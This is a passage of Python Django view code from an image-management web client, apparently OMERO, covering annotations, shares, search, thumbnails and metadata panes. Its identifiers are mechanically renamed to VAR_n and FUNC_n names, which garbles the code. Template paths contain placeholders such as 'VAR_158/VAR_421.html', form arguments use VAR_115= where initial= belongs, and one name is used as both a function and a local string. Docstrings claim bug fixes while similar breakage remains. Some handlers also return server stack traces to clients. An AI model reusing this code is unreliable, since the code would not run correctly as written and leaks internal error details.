    VAR_91, VAR_92 = tree.marshal_annotations(
        VAR_5,
        VAR_44=VAR_44,
        VAR_45=VAR_45,
        VAR_46=VAR_46,
        VAR_47=VAR_47,
        VAR_48=VAR_48,
        VAR_85=VAR_85,
        VAR_86=VAR_86,
        VAR_89=VAR_89,
        VAR_90=VAR_90,
        VAR_87=VAR_87,
        VAR_88=VAR_88,
    )
    return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_32(VAR_2, VAR_5=None, **VAR_6):
    """Marshal shares and discussions for the given member/owner as JSON.

    BUG FIXES: keyword values previously referenced undefined names
    (`conn`, `member_id`, `owner_id`, `page`, `limit`), and the
    discussions result was bound to `discussions` while the undefined
    `VAR_269` was returned — both NameErrors at runtime.
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member_id", -1)
        VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        VAR_112 = tree.marshal_shares(
            VAR_5=VAR_5, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
        VAR_269 = tree.marshal_discussions(
            VAR_5=VAR_5, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": VAR_112, "discussions": VAR_269})
@login_required()
@render_response()
def FUNC_33(VAR_2, VAR_18=None, VAR_19=None, VAR_5=None, **VAR_6):
    """Render the thumbnail grid for one container.

    VAR_18/VAR_19 are the container type name and id; the "index" query
    parameter selects the plate field for plate/acquisition containers.
    Returns a template context dict (render_response turns it into a page).
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_94 = dict()
    if VAR_18 is not None:
        if VAR_19 is not None and int(VAR_19) > 0:
            VAR_94[VAR_345(VAR_18)] = VAR_241(VAR_19)
    try:
        VAR_104 = BaseContainer(VAR_5, **VAR_94)
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_95 = None
    VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
    VAR_54 = None
    if "plate" in VAR_94 or "acquisition" in VAR_94:
        # Multi-field plates get a field-chooser form
        VAR_270 = VAR_104.getNumberOfFields()
        if VAR_270 is not None:
            VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_270})
            if VAR_93 == 0:
                # Default to the first available field
                VAR_93 = VAR_270[0]
        VAR_59 = VAR_2.GET.get("show")
        if VAR_59 is not None:
            # "show=well-1|well-2" pre-selects those wells in the grid
            VAR_346 = []
            for w in VAR_59.split("|"):
                if "well-" in w:
                    VAR_346.append(w.replace("well-", ""))
            VAR_53["select_wells"] = ",".join(VAR_346)
        VAR_53["baseurl"] = VAR_350("webgateway").rstrip("/")
        VAR_53["form_well_index"] = VAR_95
        VAR_53["index"] = VAR_93
        VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        VAR_54 = "webclient/VAR_158/VAR_421.html"
    if VAR_18 == "acquisition":
        VAR_53["acquisition"] = VAR_19
    VAR_53["isLeader"] = VAR_5.isLeader()
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_5=None, **VAR_6):
    """Return the owners of the selected objects and the groups every one
    of those owners belongs to (candidate chgrp/chown targets).

    BUG FIXES: `targetGroupIds.remove(...)` referenced an undefined name
    (the set is `VAR_99`), and `VAR_102.sort(VAR_310=...)` used an invalid
    kwarg — list.sort takes `key=`.
    """
    VAR_96 = []
    VAR_97 = set()
    VAR_98 = []
    VAR_68 = {}
    VAR_77 = {}
    for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
        VAR_154 = VAR_2.GET.get(VAR_215, None)
        if VAR_154 is not None:
            for o in VAR_5.getObjects(VAR_215, VAR_154.split(",")):
                VAR_96.append(o.getDetails().owner.id.val)
                VAR_97.add(o.getDetails().group.id.val)
    VAR_96 = list(set(VAR_96))
    # With no objects selected, fall back to the current user
    if len(VAR_96) == 0:
        VAR_96 = [VAR_5.getUserId()]
    for VAR_103 in VAR_5.getObjects(
        "Experimenter", VAR_96, opts={"load_experimentergroups": True}
    ):
        VAR_271 = []
        VAR_77[VAR_103.id] = VAR_103.getFullName()
        for VAR_101 in VAR_103.copyGroupExperimenterMap():
            VAR_68[VAR_101.parent.id.val] = VAR_101.parent
            VAR_271.append(VAR_101.parent.id.val)
        VAR_98.append(set(VAR_271))
    # Only groups common to ALL owners are valid targets
    VAR_99 = set.intersection(*VAR_98)
    VAR_100 = VAR_5.getAdminService().getSecurityRoles().userGroupId
    if VAR_100 in VAR_99:
        VAR_99.remove(VAR_100)
    # Exclude the group the objects are already in (when unambiguous)
    if len(VAR_97) == 1:
        VAR_272 = VAR_97.pop()
        if VAR_272 in VAR_99:
            VAR_99.remove(VAR_272)

    def FUNC_83(VAR_101):
        # Summarise a group's permission flags for the client
        VAR_256 = VAR_101.getDetails().permissions
        return {
            "write": VAR_256.isGroupWrite(),
            "annotate": VAR_256.isGroupAnnotate(),
            "read": VAR_256.isGroupRead(),
        }

    VAR_102 = []
    for VAR_335 in VAR_99:
        VAR_102.append(
            {"id": VAR_335, "name": VAR_68[VAR_335].name.val, "perms": FUNC_83(VAR_68[VAR_335])}
        )
    VAR_102.sort(key=lambda x: x["name"])
    VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
    return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_20, VAR_21, VAR_5=None, **VAR_6):
    """Render the container hierarchy used to pick a chgrp target."""
    VAR_5.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
    owner_id = getIntOrDefault(VAR_2, "owner", None)
    manager = BaseContainer(VAR_5)
    manager.listContainerHierarchy(owner_id)
    return {
        "manager": manager,
        "target_type": VAR_21,
        "template": "webclient/VAR_158/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_22=None, VAR_5=None, **VAR_6):
    """Run a search and render the results page.

    BUG FIXES: the query normalisation referenced the undefined name
    `query_search` (the local is `VAR_273`), and the id-list regex literal
    was mangled to r"^[\\VAR_362 ,]+$" — `\\V` is a bad escape that makes
    re.compile raise; restored to the digits/space/comma class.
    """
    VAR_104 = BaseSearch(VAR_5)
    VAR_105 = []
    VAR_71 = VAR_2.GET
    if VAR_22 is not None:
        VAR_273 = VAR_71.get("query", None)
        if VAR_273 is None:
            return HttpResponse("No search '?query' included")
        VAR_273 = VAR_273.replace("+", " ")
        VAR_274 = toBoolean(VAR_71.get("advanced"))
        if VAR_274:
            VAR_273 = VAR_71.get("advanced_search")
        VAR_54 = "webclient/search/search_details.html"
        VAR_275 = VAR_71.getlist("datatype")
        VAR_270 = VAR_71.getlist("field")
        VAR_276 = VAR_71.get("searchGroup", None)
        VAR_277 = VAR_71.get("ownedBy", None)
        VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
        VAR_279 = VAR_71.get("startdateinput", None)
        VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
        VAR_280 = VAR_71.get("enddateinput", None)
        VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
        VAR_250 = None
        if VAR_279 is not None:
            # Open-ended ranges end today
            if VAR_280 is None:
                VAR_390 = datetime.datetime.now()
                VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
            VAR_250 = "%s_%s" % (VAR_279, VAR_280)
        if len(VAR_275) == 0:
            VAR_275 = ["images"]
        VAR_104.search(
            VAR_273,
            VAR_275,
            VAR_270,
            VAR_276,
            VAR_277,
            VAR_278,
            VAR_250,
            rawQuery=VAR_274,
        )
        # A query of only digits/commas/spaces is treated as a list of ids
        # and also looked up directly across all groups
        VAR_281 = re.compile(r"^[\d ,]+$")
        if VAR_281.search(VAR_273) is not None:
            VAR_5.SERVICE_OPTS.setOmeroGroup(-1)
            VAR_347 = set()
            for queryId in re.split(" |,", VAR_273):
                if len(queryId) == 0:
                    continue
                try:
                    VAR_423 = VAR_241(queryId)
                    if VAR_423 in VAR_347:
                        continue
                    VAR_347.add(VAR_423)
                    for VAR_433 in VAR_275:
                        VAR_433 = VAR_433[0:-1]  # remove 's'
                        if VAR_433 in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            VAR_38 = VAR_5.getObject(VAR_433, VAR_423)
                            if VAR_38 is not None:
                                VAR_105.append({"otype": VAR_433, "obj": VAR_38})
                except ValueError:
                    pass
    else:
        VAR_54 = "webclient/search/search.html"
    VAR_53 = {
        "manager": VAR_104,
        "foundById": VAR_105,
        "resultCount": VAR_104.c_size + len(VAR_105),
    }
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6):
    """Render the 'general' metadata pane for one object (or a share).

    BUG FIX: `CommentAnnotationForm(VAR_115=initial)` referenced the
    undefined name `initial`; the initial-data dict built above is the
    local `VAR_115`.
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_53 = dict()
    VAR_106 = VAR_23 == "image" and list(VAR_5.getObjects("Image", [VAR_24])) or list()
    VAR_107 = (
        VAR_23 == "dataset" and list(VAR_5.getObjects("Dataset", [VAR_24])) or list()
    )
    VAR_108 = (
        VAR_23 == "project" and list(VAR_5.getObjects("Project", [VAR_24])) or list()
    )
    VAR_109 = VAR_23 == "screen" and list(VAR_5.getObjects("Screen", [VAR_24])) or list()
    VAR_110 = VAR_23 == "plate" and list(VAR_5.getObjects("Plate", [VAR_24])) or list()
    VAR_111 = (
        VAR_23 == "acquisition"
        and list(VAR_5.getObjects("PlateAcquisition", [VAR_24]))
        or list()
    )
    VAR_112 = (
        (VAR_23 == "share" or VAR_23 == "discussion")
        and [VAR_5.getShare(VAR_24)]
        or list()
    )
    VAR_113 = VAR_23 == "well" and list(VAR_5.getObjects("Well", [VAR_24])) or list()
    VAR_114 = {
        "images": VAR_23 == "image" and [VAR_24] or [],
        "datasets": VAR_23 == "dataset" and [VAR_24] or [],
        "projects": VAR_23 == "project" and [VAR_24] or [],
        "screens": VAR_23 == "screen" and [VAR_24] or [],
        "plates": VAR_23 == "plate" and [VAR_24] or [],
        "acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
        "wells": VAR_23 == "well" and [VAR_24] or [],
        "shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
    }
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_106,
        "datasets": VAR_107,
        "projects": VAR_108,
        "screens": VAR_109,
        "plates": VAR_110,
        "acquisitions": VAR_111,
        "wells": VAR_113,
        "shares": VAR_112,
    }
    VAR_116 = None
    VAR_117 = None
    if VAR_23 in ("share", "discussion"):
        VAR_54 = "webclient/annotations/annotations_share.html"
        VAR_104 = BaseShare(VAR_5, VAR_24)
        VAR_104.getAllUsers(VAR_24)
        VAR_104.getComments(VAR_24)
        VAR_116 = CommentAnnotationForm(VAR_115=VAR_115)
    else:
        try:
            VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24), "index": VAR_93})
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
        if VAR_25 is not None:
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_53["share"] = BaseShare(VAR_5, VAR_25)
        else:
            VAR_54 = "webclient/annotations/metadata_general.html"
            VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
            VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
            VAR_117 = VAR_104.listFigureScripts()
    VAR_53["manager"] = VAR_104
    if VAR_23 in ("tag", "tagset"):
        VAR_53["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if VAR_116 is not None:
        VAR_53["form_comment"] = VAR_116
    VAR_53["figScripts"] = VAR_117
    VAR_53["template"] = VAR_54
    VAR_53["webclient_path"] = VAR_350("webindex")
    return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6):
    """Render the 'preview' metadata pane: rendering defs for an image.

    BUG FIX: `VAR_119 = rdefs.values()` referenced the undefined name
    `rdefs`; the per-owner dict being reduced is the local `VAR_119`.
    """
    VAR_53 = {}
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    if VAR_25:
        VAR_53["share"] = BaseShare(VAR_5, VAR_25)
    if VAR_23 == "well":
        # For wells, preview the image of the selected field
        VAR_104.image = VAR_104.well.getImage(VAR_93)
    VAR_118 = VAR_104.image.getAllRenderingDefs()
    VAR_119 = {}
    VAR_120 = VAR_104.image.getRenderingDefId()
    # Keep only the newest (highest id) rendering def per owner
    for VAR_71 in VAR_118:
        VAR_229 = VAR_71["owner"]["id"]
        VAR_71["current"] = VAR_71["id"] == VAR_120
        if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
            VAR_119[VAR_229] = VAR_71
    VAR_119 = VAR_119.values()
    VAR_121 = []
    for VAR_71 in VAR_119:
        # Encode channels in the webgateway query-string format:
        # [-]index|start:end[-r]$color
        VAR_282 = []
        for VAR_318, VAR_383 in enumerate(VAR_71["c"]):
            VAR_348 = "-"
            if VAR_383["active"]:
                VAR_348 = ""
            VAR_349 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
            VAR_350 = "r" if VAR_383["inverted"] else "-r"
            VAR_282.append(
                "%s%s|%s:%s%s$%s" % (VAR_348, VAR_318 + 1, VAR_383["start"], VAR_383["end"], VAR_350, VAR_349)
            )
        VAR_121.append(
            {
                "id": VAR_71["id"],
                "owner": VAR_71["owner"],
                "c": ",".join(VAR_282),
                "m": VAR_71["model"] == "greyscale" and "g" or "c",
            }
        )
    VAR_122, VAR_123 = VAR_5.getMaxPlaneSize()
    VAR_124 = VAR_104.image.getSizeX()
    VAR_125 = VAR_104.image.getSizeY()
    # Images larger than the max plane size are rendered tiled
    VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
    VAR_53["manager"] = VAR_104
    VAR_53["rdefsJson"] = json.dumps(VAR_121)
    VAR_53["rdefs"] = VAR_119
    VAR_53["template"] = "webclient/annotations/metadata_preview.html"
    return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_5=None, **VAR_6):
    """Render the 'hierarchy' metadata pane for one object."""
    manager = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    return {
        "manager": manager,
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def FUNC_40(
    VAR_2, VAR_23, VAR_24, VAR_5=None, VAR_25=None, **VAR_6
):
    """Render the 'acquisition' metadata pane: channel, objective,
    microscope, filter, detector and light-source forms for an image.

    BUG FIX: inside the plane-info loop, `deltaT.getValue()` and
    `exposure.getValue()` referenced undefined names; the unit-wrapped
    values fetched above are the locals `VAR_427` and `VAR_428`.
    """
    try:
        if VAR_23 in ("share", "discussion"):
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_104 = BaseShare(VAR_5, VAR_24)
            VAR_104.getAllUsers(VAR_24)
            VAR_104.getComments(VAR_24)
        else:
            VAR_54 = "webclient/annotations/metadata_acquisition.html"
            VAR_104 = BaseContainer(VAR_5, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_126 = None
    VAR_127 = None
    VAR_128 = None
    VAR_129 = list()
    VAR_130 = None
    VAR_131 = list()
    VAR_132 = list()
    VAR_133 = list()
    VAR_134 = list()
    VAR_135 = list()
    VAR_136 = list(VAR_5.getEnumerationEntries("LaserType"))
    VAR_137 = list(VAR_5.getEnumerationEntries("ArcType"))
    VAR_138 = list(VAR_5.getEnumerationEntries("FilamentType"))
    # Lazily-loaded enumerations shared by several forms below
    VAR_139 = None
    VAR_140 = None
    VAR_141 = None
    if VAR_23 == "image":
        if VAR_25 is None:
            VAR_104.companionFiles()
        VAR_104.channelMetadata()
        for theC, ch in enumerate(VAR_104.channel_metadata):
            VAR_351 = ch.getLogicalChannel()
            if VAR_351 is not None:
                VAR_391 = dict()
                VAR_391["form"] = MetadataChannelForm(
                    VAR_115={
                        "logicalChannel": VAR_351,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            VAR_5.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            VAR_5.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(VAR_5.getEnumerationEntries("AcquisitionModeI")),
                    }
                )
                if VAR_25 is None:
                    VAR_424 = VAR_351.getLightPath()
                    if VAR_424 is not None:
                        VAR_391["form_dichroic"] = None
                        VAR_391["form_excitation_filters"] = list()
                        VAR_391["form_emission_filters"] = list()
                        VAR_434 = VAR_424.getDichroic()
                        if VAR_434 is not None:
                            VAR_391["form_dichroic"] = MetadataDichroicForm(
                                VAR_115={"dichroic": VAR_434}
                            )
                        VAR_435 = list(VAR_5.getEnumerationEntries("FilterTypeI"))
                        for f in VAR_424.getEmissionFilters():
                            VAR_391["form_emission_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                        for f in VAR_424.getExcitationFilters():
                            VAR_391["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                    VAR_425 = VAR_351.getDetectorSettings()
                    if (
                        VAR_425._obj is not None
                        and VAR_425.getDetector()
                    ):
                        VAR_391["form_detector_settings"] = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": VAR_425,
                                "detector": VAR_425.getDetector(),
                                "types": list(
                                    VAR_5.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(VAR_5.getEnumerationEntries("Binning")),
                            }
                        )
                    VAR_426 = VAR_351.getLightSourceSettings()
                    if (
                        VAR_426 is not None
                        and VAR_426._obj is not None
                    ):
                        VAR_436 = VAR_426.getLightSource()
                        if VAR_436 is not None:
                            # Pick the enum list matching the source type
                            VAR_439 = VAR_136
                            if VAR_436.OMERO_CLASS == "Arc":
                                VAR_439 = VAR_137
                            elif VAR_436.OMERO_CLASS == "Filament":
                                VAR_439 = VAR_138
                            VAR_391["form_light_source"] = MetadataLightSourceForm(
                                VAR_115={
                                    "lightSource": VAR_436,
                                    "lightSourceSettings": VAR_426,
                                    "lstypes": VAR_439,
                                    "mediums": list(
                                        VAR_5.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        VAR_5.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                VAR_391["label"] = ch.getLabel()
                VAR_349 = ch.getColor()
                VAR_391["color"] = VAR_349 is not None and VAR_349.getHtml() or None
                VAR_392 = (
                    VAR_104.image
                    and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                VAR_393 = []
                for pi in VAR_392:
                    VAR_427 = pi.getDeltaT(units="SECOND")
                    VAR_428 = pi.getExposureTime(units="SECOND")
                    if VAR_427 is None and VAR_428 is None:
                        continue
                    if VAR_427 is not None:
                        VAR_427 = VAR_427.getValue()
                    if VAR_428 is not None:
                        VAR_428 = VAR_428.getValue()
                    VAR_393.append(
                        {"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
                    )
                VAR_391["plane_info"] = VAR_393
                VAR_134.append(VAR_391)
        try:
            VAR_142 = VAR_104.well.getWellSample().image()
        except Exception:
            VAR_142 = VAR_104.image
        if VAR_25 is None:  # 9853
            if VAR_142.getObjectiveSettings() is not None:
                if VAR_139 is None:
                    VAR_139 = list(VAR_5.getEnumerationEntries("MediumI"))
                if VAR_140 is None:
                    VAR_140 = list(VAR_5.getEnumerationEntries("ImmersionI"))
                if VAR_141 is None:
                    VAR_141 = list(VAR_5.getEnumerationEntries("CorrectionI"))
                VAR_127 = MetadataObjectiveSettingsForm(
                    VAR_115={
                        "objectiveSettings": VAR_142.getObjectiveSettings(),
                        "objective": VAR_142.getObjectiveSettings().getObjective(),
                        "mediums": VAR_139,
                        "immersions": VAR_140,
                        "corrections": VAR_141,
                    }
                )
            if VAR_142.getImagingEnvironment() is not None:
                VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
            if VAR_142.getStageLabel() is not None:
                VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
            VAR_352 = VAR_142.getInstrument()
            if VAR_352 is not None:
                if VAR_352.getMicroscope() is not None:
                    VAR_128 = MetadataMicroscopeForm(
                        VAR_115={
                            "microscopeTypes": list(
                                VAR_5.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": VAR_352.getMicroscope(),
                        }
                    )
                VAR_394 = VAR_352.getObjectives()
                for o in VAR_394:
                    if VAR_139 is None:
                        VAR_139 = list(VAR_5.getEnumerationEntries("MediumI"))
                    if VAR_140 is None:
                        VAR_140 = list(VAR_5.getEnumerationEntries("ImmersionI"))
                    if VAR_141 is None:
                        VAR_141 = list(VAR_5.getEnumerationEntries("CorrectionI"))
                    VAR_429 = MetadataObjectiveForm(
                        VAR_115={
                            "objective": o,
                            "mediums": VAR_139,
                            "immersions": VAR_140,
                            "corrections": VAR_141,
                        }
                    )
                    VAR_129.append(VAR_429)
                VAR_395 = list(VAR_352.getFilters())
                if len(VAR_395) > 0:
                    for f in VAR_395:
                        VAR_437 = MetadataFilterForm(
                            VAR_115={
                                "filter": f,
                                "types": list(
                                    VAR_5.getEnumerationEntries("FilterTypeI")
                                ),
                            }
                        )
                        VAR_131.append(VAR_437)
                VAR_396 = list(VAR_352.getDichroics())
                for VAR_362 in VAR_396:
                    VAR_430 = MetadataDichroicForm(VAR_115={"dichroic": VAR_362})
                    VAR_132.append(VAR_430)
                VAR_397 = list(VAR_352.getDetectors())
                if len(VAR_397) > 0:
                    for VAR_362 in VAR_397:
                        VAR_438 = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": None,
                                "detector": VAR_362,
                                "types": list(
                                    VAR_5.getEnumerationEntries("DetectorTypeI")
                                ),
                            }
                        )
                        VAR_133.append(VAR_438)
                VAR_398 = list(VAR_352.getLightSources())
                if len(VAR_398) > 0:
                    for laser in VAR_398:
                        VAR_439 = VAR_136
                        if laser.OMERO_CLASS == "Arc":
                            VAR_439 = VAR_137
                        elif laser.OMERO_CLASS == "Filament":
                            VAR_439 = VAR_138
                        VAR_440 = MetadataLightSourceForm(
                            VAR_115={
                                "lightSource": laser,
                                "lstypes": VAR_439,
                                "mediums": list(
                                    VAR_5.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(VAR_5.getEnumerationEntries("PulseI")),
                            }
                        )
                        VAR_135.append(VAR_440)
    VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
    if VAR_23 not in ("share", "discussion", "tag"):
        VAR_53["form_channels"] = VAR_134
        VAR_53["form_environment"] = VAR_126
        VAR_53["form_objective"] = VAR_127
        VAR_53["form_microscope"] = VAR_128
        VAR_53["form_instrument_objectives"] = VAR_129
        VAR_53["form_filters"] = VAR_131
        VAR_53["form_dichroics"] = VAR_132
        VAR_53["form_detectors"] = VAR_133
        VAR_53["form_lasers"] = VAR_135
        VAR_53["form_stageLabel"] = VAR_130
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_41(VAR_2, VAR_26, VAR_5=None, VAR_25=None, **VAR_6):
    """Render the original (as-imported) metadata of an image.

    BUG FIX: `HttpResponse(VAR_286=..., VAR_313=...)` used invalid kwargs;
    Django's HttpResponse takes `content` and `status`.
    """
    VAR_142 = VAR_5.getObject("Image", VAR_26)
    if VAR_142 is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    VAR_53 = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": VAR_142.getId(),
    }
    try:
        VAR_181 = VAR_142.loadOriginalMetadata()
        if VAR_181 is not None:
            VAR_53["original_metadata"] = VAR_181[0]
            VAR_53["global_metadata"] = VAR_181[1]
            VAR_53["series_metadata"] = VAR_181[2]
    except omero.LockTimeout:
        # 408 Request Timeout when the metadata can't be loaded in time
        return HttpResponse(content="LockTimeout", status=408)
    return VAR_53
def FUNC_42(VAR_2, VAR_5=None):
    """Load the objects selected in the request, keyed by singular type name.

    Ids come from GET (or POST) list parameters; only types with at least
    one id submitted trigger a server lookup.  The "share" entry holds at
    most one share, loaded from the first submitted id.
    """
    params = VAR_2.GET or VAR_2.POST

    def _load(param_name, object_type):
        ids = params.getlist(param_name)
        return list(VAR_5.getObjects(object_type, ids)) if len(ids) > 0 else list()

    share_ids = params.getlist("share")
    return {
        "image": _load("image", "Image"),
        "dataset": _load("dataset", "Dataset"),
        "project": _load("project", "Project"),
        "screen": _load("screen", "Screen"),
        "plate": _load("plate", "Plate"),
        "acquisition": _load("acquisition", "PlateAcquisition"),
        "well": _load("well", "Well"),
        "share": [VAR_5.getShare(share_ids[0])] if len(share_ids) > 0 else list(),
    }
def FUNC_43(VAR_2):
    """Collect the raw id lists selected in the request, keyed by the
    plural type name used by the selection forms."""
    params = VAR_2.GET or VAR_2.POST
    plural_to_param = (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    )
    return {plural: params.getlist(single) for plural, single in plural_to_param}
@login_required()
@render_response()
def FUNC_44(VAR_2, VAR_5=None, **VAR_6):
    """Render the batch-annotate panel for all objects selected in the
    request, collecting labels, permissions and fileset info.

    Returns a template context dict, or an HttpResponse when the selection
    cannot be annotated at all.
    """
    VAR_143 = FUNC_42(VAR_2, VAR_5)
    VAR_144 = []
    VAR_145 = []
    VAR_146 = set()
    VAR_147 = False
    for VAR_310 in VAR_143:
        # Build "type=id" tokens used for the query/link strings below
        VAR_144 += ["%s=%s" % (VAR_310, o.id) for o in VAR_143[VAR_310]]
        for o in VAR_143[VAR_310]:
            VAR_146.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                VAR_147 = (
                    "Can't add annotations because you don't" " have permissions"
                )
            VAR_145.append({"type": VAR_310.title(), "id": o.id, "name": o.getName()})
    VAR_148 = "&".join(VAR_144)
    VAR_149 = "|".join(VAR_144).replace("=", "-")
    if len(VAR_146) == 0:
        # Nothing loadable was selected; tags get a friendlier message
        if (
            len(VAR_2.GET.getlist("tag")) > 0
            or len(VAR_2.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
        else:
            return handlerInternalError(VAR_2, "No objects found")
    VAR_150 = list(VAR_146)[0]
    VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_150)
    VAR_104 = BaseContainer(VAR_5)
    VAR_117 = VAR_104.listFigureScripts(VAR_143)
    VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
    VAR_152 = None
    VAR_153 = []
    if "image" in VAR_143 and len(VAR_143["image"]) > 0:
        VAR_153 = [VAR_318.getId() for VAR_318 in VAR_143["image"]]
    if len(VAR_153) > 0:
        # Combine fileset and archived-file counts/sizes for display
        VAR_152 = VAR_5.getFilesetFilesInfo(VAR_153)
        VAR_283 = VAR_5.getArchivedFilesInfo(VAR_153)
        VAR_152["count"] += VAR_283["count"]
        VAR_152["size"] += VAR_283["size"]
    VAR_53 = {
        "iids": VAR_153,
        "obj_string": VAR_148,
        "link_string": VAR_149,
        "obj_labels": VAR_145,
        "batch_ann": True,
        "figScripts": VAR_117,
        "canExportAsJpg": VAR_151,
        "filesetInfo": VAR_152,
        "annotationBlocked": VAR_147,
        "differentGroups": False,
    }
    if len(VAR_146) > 1:
        # Cross-group annotation is not supported
        VAR_53["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        VAR_53["differentGroups"] = True  # E.g. don't run VAR_203 etc
    VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
    VAR_53["template"] = "webclient/annotations/FUNC_44.html"
    VAR_53["webclient_path"] = VAR_350("webindex")
    VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
        FUNC_42(VAR_2, VAR_5)
    )
    return VAR_53
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_5=None, **VAR_6):
    """Render the file-annotation form (GET) or attach files (POST).

    BUG FIX: `FilesAnnotationForm(VAR_115=initial, ...)` referenced the
    undefined name `initial` in both constructions; the initial-data dict
    built above is the local `VAR_115`.
    """
    VAR_154 = FUNC_42(VAR_2, VAR_5)
    VAR_114 = FUNC_43(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    # Work in the group of the first selected object
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
